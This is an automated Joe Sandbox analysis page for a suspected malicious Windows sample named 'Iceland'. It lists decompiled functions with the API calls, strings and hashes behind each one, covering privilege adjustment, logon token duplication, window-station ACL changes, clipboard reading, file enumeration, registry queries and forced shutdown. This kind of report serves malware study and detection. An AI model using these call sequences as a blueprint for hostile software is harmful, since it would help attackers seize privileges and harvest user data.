Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9f2591a5a9496edda2564cd92bfd42c0d051d29d91370085dcc66b399c548d19
Instruction ID: b65b2cb93d3cdbcc515157ee3013f6da505709288a68885161b1224ee97393b4
Opcode Fuzzy Hash: 9f2591a5a9496edda2564cd92bfd42c0d051d29d91370085dcc66b399c548d19
Instruction Fuzzy Hash: 47319271E55318BBEB206BB55C4AFBF7E6CEF45B54F100066FA01E61D0D6B05D00BAA0

Function 00971B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00972010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0097205A
Part of subcall function 00972010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00972087
Part of subcall function 00972010: GetLastError.KERNEL32 ref: 00972097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00971BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00971BF4
CloseHandle.KERNEL32(?), ref: 00971C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00971C1D
GetProcessWindowStation.USER32 ref: 00971C36
SetProcessWindowStation.USER32(00000000), ref: 00971C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00971C5C

Part of subcall function 00971A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00971B48), ref: 00971A20
Part of subcall function 00971A0B: CloseHandle.KERNEL32(?,?,00971B48), ref: 00971A35

Strings

default, xrefs: 00971C57
, xrefs: 00971BA6
winsta0, xrefs: 00971C18

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 51624e018378284c0fc5eaf32c5a0d6c7eb11f5b201a0d46f1b9b6e558186e7b
Instruction ID: 16d0ec08454c6b6b10ca2524c967eb58b71f60aa0ba453854d1722865585d7ab
Opcode Fuzzy Hash: 51624e018378284c0fc5eaf32c5a0d6c7eb11f5b201a0d46f1b9b6e558186e7b
Instruction Fuzzy Hash: 53817A72905209AFDF219FA8DC49FEE7BBCEF49304F148029F919A61A0D7718A45DF60

Function 009714AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00971A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00971A60
Part of subcall function 00971A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A6C
Part of subcall function 00971A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A7B
Part of subcall function 00971A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009714E7,?,?,?), ref: 00971A82
Part of subcall function 00971A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00971A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00971518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0097154C
GetLengthSid.ADVAPI32(?), ref: 00971563
GetAce.ADVAPI32(?,00000000,?), ref: 0097159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009715B9
GetLengthSid.ADVAPI32(?), ref: 009715D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 009715D8
HeapAlloc.KERNEL32(00000000), ref: 009715DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00971600
CopySid.ADVAPI32(00000000), ref: 00971607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00971636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00971658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0097166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00971691
HeapFree.KERNEL32(00000000), ref: 00971698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009716A1
HeapFree.KERNEL32(00000000), ref: 009716A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009716B1
HeapFree.KERNEL32(00000000), ref: 009716B8
GetProcessHeap.KERNEL32(00000000,?), ref: 009716C4
HeapFree.KERNEL32(00000000), ref: 009716CB

Part of subcall function 00971ADF: GetProcessHeap.KERNEL32(00000008,009714FD,?,00000000,?,009714FD,?), ref: 00971AED
Part of subcall function 00971ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009714FD,?), ref: 00971AF4
Part of subcall function 00971ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009714FD,?), ref: 00971B03

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 820e110f85defbc8f5a1482496c425a62cad573455fce98f580ca36c00f6d0af
Instruction ID: d710c1673c3fdb85b7b507ecc2bc21b3640d369d98b94a68b80bdd983f621c84
Opcode Fuzzy Hash: 820e110f85defbc8f5a1482496c425a62cad573455fce98f580ca36c00f6d0af
Instruction Fuzzy Hash: 3F716BB290521AABDF10DFA9DC44FEEBBBCBF44740F088515F91AA6190D731DA05CBA0

Function 0098F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(009ADCD0), ref: 0098F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 0098F594
GetClipboardData.USER32(0000000D), ref: 0098F5A0
CloseClipboard.USER32 ref: 0098F5AC
GlobalLock.KERNEL32(00000000), ref: 0098F5E4
CloseClipboard.USER32 ref: 0098F5EE
GlobalUnlock.KERNEL32(00000000), ref: 0098F619
IsClipboardFormatAvailable.USER32(00000001), ref: 0098F626
GetClipboardData.USER32(00000001), ref: 0098F62E
GlobalLock.KERNEL32(00000000), ref: 0098F63F
GlobalUnlock.KERNEL32(00000000), ref: 0098F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 0098F695
GetClipboardData.USER32(0000000F), ref: 0098F6A1
GlobalLock.KERNEL32(00000000), ref: 0098F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0098F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0098F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0098F72F
GlobalUnlock.KERNEL32(00000000), ref: 0098F750
CountClipboardFormats.USER32 ref: 0098F771
CloseClipboard.USER32 ref: 0098F7B6

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 700ce507fcdb76f480f9e9dec3efcf3cc3c633a30b35ccead2b3484669c22c11
Instruction ID: e6f11d53d9639248f54e5d77d6499a26fb2f0cb41e6a0723b79c5e2065928b6d
Opcode Fuzzy Hash: 700ce507fcdb76f480f9e9dec3efcf3cc3c633a30b35ccead2b3484669c22c11
Instruction Fuzzy Hash: F661C135209205AFD300FF20D895FAAB7A8EF85704F14456CF896873A2DB31DD45DBA2

Function 009873D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00987403
FindClose.KERNEL32(00000000), ref: 00987457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00987493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009874BA

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 009874F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00987524

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00987577
%03d, xrefs: 009877E7
%4d%02d%02d%02d%02d%02d, xrefs: 009875AF
%02d, xrefs: 00987645, 0098764F, 0098769F, 009876EF, 0098773F, 0098778F
%4d, xrefs: 009875F6

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: e0409a05cea4b3b201271cfdc8db63f11fa2525f308b2fad79bdadd447d32442
Instruction ID: 8ac9589904b7ff6b2f9d102bb053143b39bed90c7ea75a5e4ca7f2a35c9969e0
Opcode Fuzzy Hash: e0409a05cea4b3b201271cfdc8db63f11fa2525f308b2fad79bdadd447d32442
Instruction Fuzzy Hash: AAD141B2608344AFC314EBA4C895EAFB7ECAFC8704F44491DF589D6291EB74DA44C762

Function 0098A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0098A0A8
GetFileAttributesW.KERNEL32(?), ref: 0098A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 0098A100
FindNextFileW.KERNEL32(00000000,?), ref: 0098A118
FindClose.KERNEL32(00000000), ref: 0098A123
FindFirstFileW.KERNEL32(*.*,?), ref: 0098A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 0098A18F
SetCurrentDirectoryW.KERNEL32(009D7B94), ref: 0098A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 0098A1B7
FindClose.KERNEL32(00000000), ref: 0098A1C4
FindClose.KERNEL32(00000000), ref: 0098A1D4

Strings

*.*, xrefs: 0098A13A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 31768b8ca5daa14c4550a20c5c8a5d8ad23684c37a7895c632f3722243e36edf
Instruction ID: 1d396a18785261ea1eea8ec155298686a096fc08daaec2670faca89c25921fb7
Opcode Fuzzy Hash: 31768b8ca5daa14c4550a20c5c8a5d8ad23684c37a7895c632f3722243e36edf
Instruction Fuzzy Hash: 4631D5315092196BEB10BFB4DC4DAEE73ACAF49324F104056F815D2290EB74DE44DBA5

Function 00984763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00984785
_wcslen.LIBCMT ref: 009847B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 009847E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00984803
RemoveDirectoryW.KERNEL32(?), ref: 00984813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0098489A
CloseHandle.KERNEL32(00000000), ref: 009848A5
CloseHandle.KERNEL32(00000000), ref: 009848B0

Strings

\??\%s, xrefs: 009847A0
\, xrefs: 009847BC
:, xrefs: 009847C7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: fcbcfab8875c3c416e7e905a377d81719c312f9555d878423ae1f5010300b9f1
Instruction ID: e668ccc6c95b96431c5c20d84904d7431e755d35b52badf515748cae39a3e436
Opcode Fuzzy Hash: fcbcfab8875c3c416e7e905a377d81719c312f9555d878423ae1f5010300b9f1
Instruction Fuzzy Hash: 2731C37190424AABDB21AFA0DC49FEF37BCEF8A744F1040B6F919D2160EB749644CB64

Function 0098A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0098A203
FindNextFileW.KERNEL32(00000000,?), ref: 0098A25E
FindClose.KERNEL32(00000000), ref: 0098A269
FindFirstFileW.KERNEL32(*.*,?), ref: 0098A285
SetCurrentDirectoryW.KERNEL32(?), ref: 0098A2D5
SetCurrentDirectoryW.KERNEL32(009D7B94), ref: 0098A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 0098A2FD
FindClose.KERNEL32(00000000), ref: 0098A30A
FindClose.KERNEL32(00000000), ref: 0098A31A

Part of subcall function 0097E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0097E3B4

Strings

*.*, xrefs: 0098A280

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: b48834d66e7fe506ff15bba6c79f4d89228934c0efcc091b8be9064a5c92ad25
Instruction ID: d4a9455696e0b3b23f7d8982e8768b0a3d3126e36cf97d79638b87a230f9cf34
Opcode Fuzzy Hash: b48834d66e7fe506ff15bba6c79f4d89228934c0efcc091b8be9064a5c92ad25
Instruction Fuzzy Hash: 9E31E5325056196AEF20BFA4DC09BDE77AC9F89328F104153F821A3290EB75DE45CB95

Function 0099C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0099D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0099C10E,?,?), ref: 0099D415
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D451
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D4C8
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0099C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0099CA09
RegCloseKey.ADVAPI32(00000000), ref: 0099CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0099CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0099CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0099CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0099CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0099CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0099CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0099CDE2
RegCloseKey.ADVAPI32(00000000), ref: 0099CDEF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 56805595d436ae549f1f205dfa7ac33f1921635b3351ec46b705458cd347e3d1
Instruction ID: 47fe3afeb870d5ac506d780f0a4cd95de634fea573bd0214d56693e897c14661
Opcode Fuzzy Hash: 56805595d436ae549f1f205dfa7ac33f1921635b3351ec46b705458cd347e3d1
Instruction Fuzzy Hash: 220223B16042049FDB14DF28C895F2ABBE5EF89314F18849DF44ADB2A2D731ED46CB91

Function 0097D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00915851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009155D1,?,?,00954B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00915871

Part of subcall function 0097EAB0: GetFileAttributesW.KERNEL32(?,0097D840), ref: 0097EAB1

FindFirstFileW.KERNEL32(?,?), ref: 0097D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0097DA88
MoveFileW.KERNEL32(?,?), ref: 0097DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 0097DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 0097DAE2

Part of subcall function 0097DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0097DAC7,?,?), ref: 0097DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 0097DAFE
FindClose.KERNEL32(00000000), ref: 0097DB0F

Strings

\*.*, xrefs: 0097D978, 0097D981, 0097D996

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 07e4633aa0e2e3563f9c32c0639bfdc654394d20430593cbb431eb406f2c37c7
Instruction ID: 90c845091afe1e24b1c931478d78396a4acd52da51a6aba9863a64ddf1919c2f
Opcode Fuzzy Hash: 07e4633aa0e2e3563f9c32c0639bfdc654394d20430593cbb431eb406f2c37c7
Instruction Fuzzy Hash: C661517290610DEFCF05EBE0D992AEDB7B9AF95300F2480A5E40A77191EB315F49CB90

Function 0098F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0098F7EE
EmptyClipboard.USER32 ref: 0098F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 0098F809
CloseClipboard.USER32 ref: 0098F900

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: c5c208927e469edaf9783ca9447075c60ffbbfbaf88eb57feb41316795bcb83f
Instruction ID: e54b87f33e1c96a351a6eb0999e3839032fc16d9be041e70cb3eade99a72d8b6
Opcode Fuzzy Hash: c5c208927e469edaf9783ca9447075c60ffbbfbaf88eb57feb41316795bcb83f
Instruction Fuzzy Hash: 8A418B31609601AFD310DF15D898B55BBA4FF85318F14C4A8E86A8BB62CB35EC42CBD0

Function 0097F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00972010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0097205A
Part of subcall function 00972010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00972087
Part of subcall function 00972010: GetLastError.KERNEL32 ref: 00972097

ExitWindowsEx.USER32(?,00000000), ref: 0097F249

Strings

SeShutdownPrivilege, xrefs: 0097F219
, xrefs: 0097F273
@, xrefs: 0097F23C
, xrefs: 0097F237

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 5e19142c84cfd9a9f09bf8c3e6f331dd4d83ab84b4baebc1ffd7a492625ba325
Instruction ID: c25518a634b85bdb589134edca59b6b74608d4e7d5e322ceec857b97a151bd1b
Opcode Fuzzy Hash: 5e19142c84cfd9a9f09bf8c3e6f331dd4d83ab84b4baebc1ffd7a492625ba325
Instruction Fuzzy Hash: 6601D67B7252106BEB1862B89C9ABBE726C9F49354F158931FD27F21D3D5644D0091A0

Function 0094BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0094BD54
_free.LIBCMT ref: 0094BD78
_free.LIBCMT ref: 0094BEFF
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009B46D0), ref: 0094BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,009E221C,000000FF,00000000,0000003F,00000000,?,?), ref: 0094BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,009E2270,000000FF,?,0000003F,00000000,?), ref: 0094BFB6
_free.LIBCMT ref: 0094C0CB

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: e17c77aee6e8359cea26446fc2cd9b6edb9cec2b1a6b7f26448f0fdc78714b29
Instruction ID: 34ac88c563f8058c242ea11d6130193f350b705b640a54cf42bae69735b848b8
Opcode Fuzzy Hash: e17c77aee6e8359cea26446fc2cd9b6edb9cec2b1a6b7f26448f0fdc78714b29
Instruction Fuzzy Hash: 32C13A71904248AFDB24AF78CC41FAE7BBDEF81310F1445AAE5959B291E730CE42DB90

Function 00983A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009556C2,?,?,00000000,00000000), ref: 00983A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009556C2,?,?,00000000,00000000), ref: 00983A35
